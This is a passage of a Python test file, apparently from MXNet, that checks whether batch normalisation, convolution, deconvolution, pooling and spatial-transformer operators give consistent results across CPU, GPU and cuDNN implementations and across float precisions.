use_global_stats=use_global_stats, name='batchnorm')) # BatchNorm gpu (organic) if 'batchnorm_gpu' in batchnorm_op_list: ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm', cudnn_off=True)) # BatchNorm gpu cudnn (if cudnn is enabled) if 'batchnorm_cudnn' in batchnorm_op_list: ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}}) sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma, use_global_stats=use_global_stats, name='batchnorm', cudnn_off=False)) check_consistency(sym_list, ctx_list) def test_1d_batchnorm(fix_gamma, use_global_stats): data = (2, 3, 20) test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu', 'batchnorm_cudnn'], data=data, fix_gamma=fix_gamma, use_global_stats=use_global_stats) def test_2d_batchnorm(fix_gamma, use_global_stats): data = (2, 3, 10, 10) test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu', 'batchnorm_cudnn'], data=data, fix_gamma=fix_gamma, use_global_stats=use_global_stats) def test_3d_batchnorm(fix_gamma, use_global_stats): data = (2, 3, 3, 5, 5) test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu', 'batchnorm_gpu'], data=data, fix_gamma=fix_gamma, use_global_stats=use_global_stats) test_1d_batchnorm(True, 
False) test_1d_batchnorm(False, False) test_1d_batchnorm(False, True) test_1d_batchnorm(True, True) test_2d_batchnorm(True, False) test_2d_batchnorm(False, False) test_2d_batchnorm(False, True) test_2d_batchnorm(True, True) test_3d_batchnorm(True, False) test_3d_batchnorm(False, False) test_3d_batchnorm(False, True) test_3d_batchnorm(True, True) @with_seed(1234) @assert_raises_cudnn_not_satisfied(min_version='5.1.10') @pytest.mark.serial def test_convolution_with_type(): sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv') data = mx.sym.Variable('conv_data') w = mx.sym.Variable('conv_weight') b = mx.sym.Variable('conv_bias') w = mx.sym.transpose(w, axes=(0,2,3,1)) sym2 = mx.sym.transpose(data, axes=(0,2,3,1)) sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3)) sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv') sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2] ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}}, # NHWC {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3), 'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3), 'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}} ] # wider tolerance needed for true-fp16 NCHW test above tol = {np.dtype(np.float16): 0.5, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, rtol=tol, atol=tol) # test ability to turn off training on bias check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, rtol=tol, atol=tol) # Apply N symbols against each of M contexts, checking that all NxM combinations match. def check_consistency_NxM(sym_list, ctx_list): # e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are: # sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3] check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5) @pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. 
tracked at https://github.com/apache/incubator-mxnet/issues/10141") @with_seed() @pytest.mark.serial def test_convolution_options(): # 1D convolution ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}] # Pad > 0 sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 1x1 convolution sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 2D convolution ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}] # Pad > 0 sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 1x1 convolution sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 3D convolution ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] # Pad > 0 sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') 
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 1x1 convolution sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv') sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) @with_seed() @pytest.mark.serial def test_conv_deconv_guards(): # Test cases for convolution and deconvolution via strided fft. Ensure that the framework # guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5) # see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750 for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]: dataname = opname + '_data' ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}} test_cases = [ {'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname}, {'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}] for test_case_args in test_cases: try: sym = op(**test_case_args) sym_no_cudnn = op(cudnn_off=True, **test_case_args) check_consistency([sym, sym_no_cudnn], [ctx, ctx], scale=0.1) except: print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args)) raise def _conv_with_num_streams(seed): with random_seed(seed): # Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad num_trials = 20 for _ in range(num_trials): size = np.random.randint(32, 128) # The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible # kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'. 
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size), 'type_dict': {'conv_data': np.float32}} # Adding 'flip' here isolates the model from the input node (which can't use inplace store) flipped = mx.sym.flip(axis=0, name='conv') sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv') flipped_no_cudnn = mx.sym.flip(axis=0, name='conv') sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') try: # tol can be pretty high- we're looking for a large diff due to garbaged workspace check_consistency([sym, sym_no_cudnn], [ctx, ctx], rtol=1e-2, atol=1e-2) except: print('Failing conv size = {}'.format(size)) raise @pytest.mark.skip(reason="skipping for now due to severe flakiness") @with_seed() def test_convolution_multiple_streams(): for num_streams in ['1', '2']: for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']: print('Starting engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr) run_in_spawned_process(_conv_with_num_streams, {'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine}) print('Finished engine {} with {} streams.'.format(engine, num_streams), file=sys.stderr) # This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c. # Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f). @with_seed() @pytest.mark.serial def test_convolution_large_c(): problematic_c = 64 * 1024 # The convolution accumulates many values, so scale the input magnitude. scale = 0.1 def test_1D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}] sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv') check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale) def test_2D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}] sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv') check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale) # Run with different data tensor shapes to run cudnnFind() multiple times. # First, populate algo and op caches with models that always use cudnnFind() (req == 'write'). # Then run models that must avoid cached cudnnFind() results in some cases (req == 'add'). widths = [4, 16, 64] for req in ['write', 'add']: for width in widths: test_1D_with_width(width, req) test_2D_with_width(width, req) # This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c. # Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f). @with_seed() @pytest.mark.serial def test_deconvolution_large_c(): problematic_c = 64 * 1024 # The deconvolution accumulates many values, so scale the input magnitude. 
scale = 0.1 def test_1D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}] sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv') check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale) def test_2D_with_width(width, grad_req): ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}] sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv') check_consistency([sym, sym], ctx_list, grad_req=grad_req, scale=scale) # Run with different data tensor shapes to run cudnnFind() multiple times. # First, populate algo and op caches with models that always use cudnnFind() (req == 'write'). # Then run models that must avoid cached cudnnFind() results in some cases (req == 'add'). widths = [4, 16, 64] for req in ['write', 'add']: for width in widths: test_1D_with_width(width, req) test_2D_with_width(width, req) @with_seed() @pytest.mark.serial def test_convolution_versions(): # 2D convolution NCHW ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}] conv_v1_cpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_v1_gpu = mx.sym.Convolution_v1(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv') conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv') syms = [conv_v1_cpu, conv_v1_gpu, conv_cudnn, conv_cpu, conv_gpu] check_consistency(syms, ctx_list) # 3D convolution NCDHW ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}, {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] conv_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') conv_cpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') conv_gpu = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') syms = [conv_cudnn, conv_cpu, conv_gpu] check_consistency(syms, ctx_list) # More max-pooling strides and pads to test cudnn pooling implementation code paths @with_seed() @pytest.mark.serial def test_pooling_nhwc_with_convention(): def make_pooling_syms(**kwargs): # Conventional NCHW layout pooling sym = mx.sym.Pooling(**kwargs) # NHWC pooling data = mx.sym.Variable('pool_data') sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1)) sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs) sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool') return [sym, sym_nhwc] # While the float32 and float64 output is reliably consistent, float16 
departs occasionally. # We compare nhwc and nchw results only within a given precision. for in_shape in [(3, 4, 8, 8), (2, 2, 20, 20)]: for kernel in [(2,2), (3,3), (4,4)]: for stride in [(1,1), (1,2), (2,1), (2,2)]: for data_type in [np.float64, np.float32, np.float16]: ctx_list = [{'ctx': mx.gpu(0), 'pool_data': in_shape, 'type_dict': {'pool_data': data_type}}] symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride, pooling_convention='valid', name='pool') check_consistency_NxM(symlist, ctx_list) symlist = make_pooling_syms(kernel=kernel, pool_type='max', stride=stride, pooling_convention='full', name='pool') check_consistency_NxM(symlist, ctx_list) symlist = make_pooling_syms(kernel=(300,300), pool_type='max', global_pool=True, name='pool') check_consistency_NxM(symlist, ctx_list) @pytest.mark.serial def test_pooling_with_type(): ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}, {'ctx': mx.gpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float16}}, {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.cpu(0), 'pool_data': (2, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}] sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='valid', name='pool') check_consistency(sym, ctx_list, rand_type=np.float16) sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool') check_consistency(sym, ctx_list, rand_type=np.float16) sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool') check_consistency(sym, ctx_list, rand_type=np.float16) @with_seed() @pytest.mark.serial def test_deconvolution_with_type(): # Test basic deconvolution without exercising stride, pad or dilation. 
# 1D deconvolution sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv') ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}] # wider tolerance needed for true-fp16 test above tol = {np.dtype(np.float16): 0.3, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, rtol=tol, atol=tol) check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add") # 2D deconvolution sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv') ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}] # wider tolerance needed for true-fp16 test above tol = {np.dtype(np.float16): 0.3, np.dtype(np.float32): 1e-3, np.dtype(np.float64): 1e-5, np.dtype(np.uint8): 0, np.dtype(np.int32): 0} check_consistency(sym, ctx_list, rtol=tol, atol=tol) check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add") @with_seed() @pytest.mark.serial def test_deconvolution_options(): # 1D deconvolution ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}] # Pad > 0 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # 2D deconvolution ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}, {'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}}, {'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}] 
# Pad > 0 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Stride > 1 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # Dilate > 1 sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv') sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv') check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # # 3D deconvolution (not yet enabled) # ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}}, # {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}] # # Pad > 0 # sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv') # sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv') # check_consistency_NxM([sym, sym_no_cudnn], ctx_list) # # Stride > 1 # sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv') # sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv') # check_consistency_NxM([sym, sym_no_cudnn], ctx_list) @with_seed(1234) def test_bilinear_sampler_with_type(): data = mx.sym.Variable('data') grid = mx.sym.Variable('grid') sym = mx.sym.BilinearSampler(data=data, grid=grid) ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float32}}, {'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float16}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @with_seed() def test_grid_generator_with_type(): data = mx.sym.Variable('data') sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20)) scale = 1 ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}, {'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list, scale=scale) check_consistency(sym, ctx_list, scale=scale, grad_req="add") sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20)) ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}, {'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @with_seed() def test_spatial_transformer_with_type(): data = mx.sym.Variable('data') loc = mx.sym.Flatten(data) loc = mx.sym.FullyConnected(data=loc, num_hidden=10) loc = mx.sym.Activation(data=loc, act_type='relu') loc = mx.sym.FullyConnected(data=loc, num_hidden=6) sym = 
mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10), transform_type="affine", sampler_type="bilinear", cudnn_off=True) ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}, {'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}] check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10), transform_type="affine", sampler_type="bilinear", cudnn_off=False) check_consistency(sym, ctx_list) check_consistency(sym, ctx_list, grad_req="add") @with_seed() def test_pooling_with_type2(): # While the float32 and float64 output is reliably consistent, float16 departs occasionally. # We compare cpu and gpu results only within a given precision. for data_type in [np.float64, np.float32, np.float16]: ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}, {'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}] sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum') check_consistency(sym, ctx_list) @with_seed() def test_pooling_nhwc_with_type(): def make_pooling_syms(**kwargs): # Conventional NCHW layout pooling sym = mx.sym.Pooling(**kwargs) # NHWC pooling data = mx.sym.Variable('pool_data') sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1)) sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs) sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool') return [sym, sym_nhwc] # While the float32 and float64 output is reliably consistent, float16 departs occasionally. # We compare nhwc and nchw results only within a given precision. 
